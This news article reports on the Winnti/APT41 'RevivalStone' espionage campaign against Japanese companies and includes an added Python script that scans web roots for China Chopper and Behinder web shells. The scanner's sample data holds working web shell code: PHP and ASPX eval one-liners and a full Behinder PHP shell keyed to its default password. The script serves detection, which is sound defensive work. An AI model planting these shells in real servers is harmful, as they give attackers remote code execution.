The China-linked cyber espionage group known as Winnti has been attributed to a sophisticated new campaign, dubbed RevivalStone, targeting Japanese companies across key industries, including manufacturing, materials, and energy.
The RevivalStone campaign, detailed in a report by Japanese cybersecurity company LAC, began in March 2024 and overlaps with a broader threat cluster identified by multiple cybersecurity firms: Trend Micro tracks the group as Earth Freybug, Cybereason documents its activity as Operation CuckooBees, and Symantec refers to it as Blackfly. All of these names are considered subsets of APT41, a Chinese state-sponsored cyber espionage group that has been active for over a decade.
LAC’s findings provide additional insight into the group’s evolving tactics, techniques, and procedures (TTPs). APT41 is known for executing highly sophisticated espionage campaigns as well as software supply chain compromises. The group relies heavily on stealth, using custom malware and tooling designed to evade security controls, exfiltrate sensitive data, and maintain long-term covert access to victim environments.
Recent attacks, spanning from November 2023 to October 2024, leveraged vulnerabilities in public-facing applications such as IBM Lotus Domino to deliver several malware families: Deathlotus (a passive CGI backdoor supporting file creation and command execution); Unapimon (a defense evasion utility); Privatelog (a loader used to deploy the Winnti remote access trojan (RAT), also known as Deploylog, which in turn installs a kernel-level rootkit named WINNKIT); Cunningpigeon (a backdoor that uses the Microsoft Graph API for command and control); Windjammer (a rootkit for intercepting network traffic and creating covert communication channels); and Shadowgaze (a passive backdoor that reuses the IIS web server's listening port for stealthy communications).
The RevivalStone attack chain began with an SQL injection vulnerability in an enterprise resource planning (ERP) system, which allowed the attackers to drop web shells, such as China Chopper and Behinder (also known as Bingxia and IceScorpion), onto the compromised server. These tools were used for reconnaissance, credential collection, lateral movement, and the delivery of an enhanced version of the Winnti malware.
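Because the initial foothold was a web shell dropped through the ERP server, the most useful first check for a defender is a scan of the web root for the two families named above. The script below is an added example, not code from LAC's report or from the attackers' tooling: it looks for the stock forms of China Chopper (a one-liner that passes a request parameter straight to eval) and Behinder (which AES-decrypts the raw request body using a key derived from the connection password, then evaluates the plaintext). The file contents, paths, indicator names and scoring weights are all constructed for this example; the Behinder key is derived from the tool's documented default password "rebeyond", on the assumption that the operator kept the stock value. Real deployments are frequently modified, so treat these as a starting point for hunting rather than a complete signature set.

```python
import hashlib
import re

# Behinder's AES key is the first 16 hex characters of MD5(connection password).
# "rebeyond" is the tool's documented default; assumption: the sample keeps it.
BEHINDER_DEFAULT_KEY = hashlib.md5(b"rebeyond").hexdigest()[:16]

# (tag, pattern, weight). Weights are a hypothetical scoring scheme for this example.
INDICATORS = [
    # China Chopper: attacker-controlled request parameter fed directly to eval
    ("chopper_php",  re.compile(r'@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[', re.I), 3),
    ("chopper_aspx", re.compile(r'eval\s*\(\s*Request\.Item\s*\[[^\]]*\]\s*,\s*"unsafe"', re.I), 3),
    ("chopper_asp",  re.compile(r'<%\s*eval\s+request\s*\(', re.I), 3),
    # Behinder (PHP): stock key, AES decrypt of php://input, eval via __invoke
    ("behinder_key",    re.compile(re.escape(BEHINDER_DEFAULT_KEY)), 3),
    ("behinder_aes",    re.compile(r'openssl_decrypt\s*\([^;]*AES', re.I), 2),
    ("behinder_body",   re.compile(r'file_get_contents\s*\(\s*[\'"]php://input[\'"]\s*\)'), 1),
    ("behinder_invoke", re.compile(r'__invoke\s*\([^)]*\)\s*\{[^}]*eval\s*\(', re.I), 2),
    # Behinder (JSP): decrypted payload loaded as a class in memory
    ("behinder_jsp", re.compile(r'extends\s+ClassLoader[\s\S]*defineClass\s*\(', re.I), 2),
]

THRESHOLD = 3  # one strong indicator, or a combination of weaker ones


def scan_source(text: str) -> tuple[int, list[str]]:
    """Return (score, matched indicator tags) for one file's contents."""
    hits = [(tag, weight) for tag, rx, weight in INDICATORS if rx.search(text)]
    return sum(w for _, w in hits), [t for t, _ in hits]


def is_webshell(text: str, threshold: int = THRESHOLD) -> bool:
    score, _ = scan_source(text)
    return score >= threshold


def scan_files(files: dict[str, str], threshold: int = THRESHOLD) -> dict[str, list[str]]:
    """Map each flagged path to the indicator tags that fired."""
    flagged = {}
    for path, text in files.items():
        score, tags = scan_source(text)
        if score >= threshold:
            flagged[path] = tags
    return flagged


# Constructed sample web root (paths and contents invented for this example).
SAMPLE_FILES = {
    # China Chopper PHP one-liner
    "wwwroot/erp/upload/img.php": "<?php @eval($_POST['pass']); ?>",
    # China Chopper ASPX one-liner
    "wwwroot/erp/upload/cfg.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    # Behinder PHP shell with the stock key
    "wwwroot/erp/upload/cache.php": (
        "<?php\n@error_reporting(0);\nsession_start();\n"
        f'$key="{BEHINDER_DEFAULT_KEY}";\n$_SESSION[\'k\']=$key;\n'
        '$post=file_get_contents("php://input");\n'
        '$post=openssl_decrypt($post, "AES128", $key);\n'
        "$arr=explode('|',$post);\n$func=$arr[0];\n$params=$arr[1];\n"
        'class C{public function __invoke($p) {eval($p."");}}\n'
        "@call_user_func(new C(),$params);\n?>"
    ),
    # Benign ERP page: reads a parameter but never evaluates it
    "wwwroot/erp/index.php": "<?php $id = (int)$_GET['id']; echo $id; ?>",
}


if __name__ == "__main__":
    for path, tags in scan_files(SAMPLE_FILES).items():
        print(f"{path}: {', '.join(tags)}")
```

Run it against a copy of the real web root by replacing SAMPLE_FILES with a walk of the directory; files flagged only on the weak indicators (score below 3) are worth a manual look, since Behinder variants routinely rotate the key and rename the class.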
The attackers further expanded their reach by abusing a shared account belonging to a managed service provider (MSP), which enabled them to propagate the malware to three additional organizations.
Researchers at LAC also discovered references to TreadStone and StoneV5 in the malware associated with the RevivalStone campaign. TreadStone is thought to be a controller designed to work with the Winnti malware. The group’s latest malware appears to be a version upgrade, possibly Winnti v5.0, incorporating advanced features such as enhanced obfuscation, updated encryption algorithms, and improved evasion techniques to bypass modern security defenses.